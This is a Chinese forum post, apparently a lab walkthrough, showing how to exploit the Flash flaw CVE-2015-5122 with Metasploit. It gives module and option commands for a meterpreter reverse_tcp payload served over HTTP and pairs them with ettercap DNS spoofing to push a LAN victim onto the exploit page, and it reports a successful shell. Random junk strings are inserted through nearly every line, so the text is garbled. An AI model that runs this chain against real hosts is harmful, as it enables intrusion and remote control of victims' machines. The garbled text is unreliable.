找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1529|回复: 0
打印 上一主题 下一主题

cve2015-5122漏洞实例演示虚拟机

[复制链接]
跳转到指定楼层
楼主
发表于 2018-10-20 20:28:02 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

9 f+ z$ Y' K0 w, s5 k* D, I5 o+ z 二、cve2015-5122漏洞实例演示虚拟机 1 w# Q2 e# G7 A& r( R% F

3 Y- {; @3 g, b& ?% ~% ^' O

, X- x" G: E2 f: F( B$ [4 `   关于cve2015-5122这个漏洞,大家可以百度一下,是关于flash的漏洞,是2015flash漏洞的第二发,今天我们就用这个漏洞来演示,开启kai linux msfconsole命令启动msf如图: # ~. H9 ^3 `8 ~: e

' c* b) h$ {. r

3 g; [& c+ m8 @) ^7 W4 @ search cve-2015-5122如图: 2 A! w, J4 ^* I6 d4 Q3 }2 y. z

( R! m# D0 y. g( Z

5 j% z" v, P/ p) m   % r) T0 i. O8 ~

& y' m! O- |5 @

! W) c! v1 y6 J; e- E- U$ V 下面我们敲如下命令: 6 K h+ H3 e: F ~

: n# D4 _, y' j) g/ P% L

$ F f' ^. |, m$ y' ^- ^) V6 Z use exploit/multi/browser/adobe_flash_opaque_background_uaf ! E: F2 g: x8 H7 r4 h

1 N8 ]2 O( v9 X

* I! Y2 a/ a- m6 c+ V" l set PAYLOAD windows/meterpreter/reverse_tcp 5 e2 L q0 B; P+ ]3 l0 E z( }

9 H* |- O. C5 I

: f8 I5 u2 q$ {2 Q; } set LHOST 192.168.0.109 6 V- H$ [& ^5 L& |: D( R

1 o* b2 Z i+ ~% g; m2 }

# v0 }7 a/ H# o% _4 _ J* b set URIPATH /                        /*根目录*/ & _* B: w9 X, D: K: a) Y

* k! q; x# g: `

% t9 K2 [0 C2 B+ j set SRVHOST 192.168.0.109  //192.168.0.109kaili ip地址 ! t# c' ?. r2 ~, o

' _- L" Z; T7 R# B1 [

% e4 b7 g+ Y4 B set SRVPORT 80            /*80端口*/ 使用80端口时要保证apache为停止状态用service apache2 stop命令停止否则会提示端口被占用 ' T S) O3 H: n; F4 T

/ @: l- n n% v$ S4 U

$ s' {5 C: Y* ]; M: k& T7 D4 w 然后show options如图: 8 _ r, D- i- p: x0 i

& d3 H' V) B( N o. Q Q1 L8 [

) f- Q% Q' }- q   $ t1 G- x- O. z6 D0 T% K0 V- h

5 Y4 k: i1 ]7 {$ D. v

7 a0 q! r N) T7 U" _8 { 一切都设置好了,执行exploit下面我们进etc/ettercap目录下设置etc.dns如图:
! C3 k/ f* q, H! C4 [" Q: }! D9 Q" r% g
1 }; J! T( a2 `" x9 j( w

7 Z8 g/ E+ m' e. M3 w) u+ t

; i4 u3 C7 [4 i9 M( g1 b 然后ettercap -G命令打开ettercap,我们要攻击的主机ip192.168.0115 ; \ v! |9 w3 Y- ?2 N& U( V, q

) P7 C" i% s1 l: s! q

! {! a9 s1 T7 Z) Y' U Ettercap过程第一篇里已经演示,这里不在详细写了。。。执行完ettercap以后我们观察一下msf f7 o2 I& t/ D

0 Y% K7 g; G* t6 S% B

5 ^: n T) N& h( C   - B1 a3 s0 b) n9 Q( d0 {) X* v

# P: g% W% E T1 E+ O& F. ~9 m/ H [

' h$ d, R" q$ x! h0 Z 成功了,这时候我们断开ettercap,如图: 1 u' r7 C* T1 ` ]5 t2 b, }+ W

1 v8 \, z0 `, m- ~1 I

$ p% X3 o( J* |% ^$ l   $ [9 e' M, J7 a2 {2 y: w4 A

; p( z ?% C/ l! x% E1 |1 ^

) |- z3 g/ j6 U8 j Screenshot如图: 2 O" `/ A: B* q% r& r7 F

E- A! I5 N2 O( p# V) @8 E6 P3 {

5 z7 J7 T7 M) G1 J* v* l% E   ' T6 y8 Y! l# d/ @# S

: n6 R" _! r7 X( U# g

( K; t: a5 C9 ]0 O/ J + T3 h- @, T& n$ t+ J

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表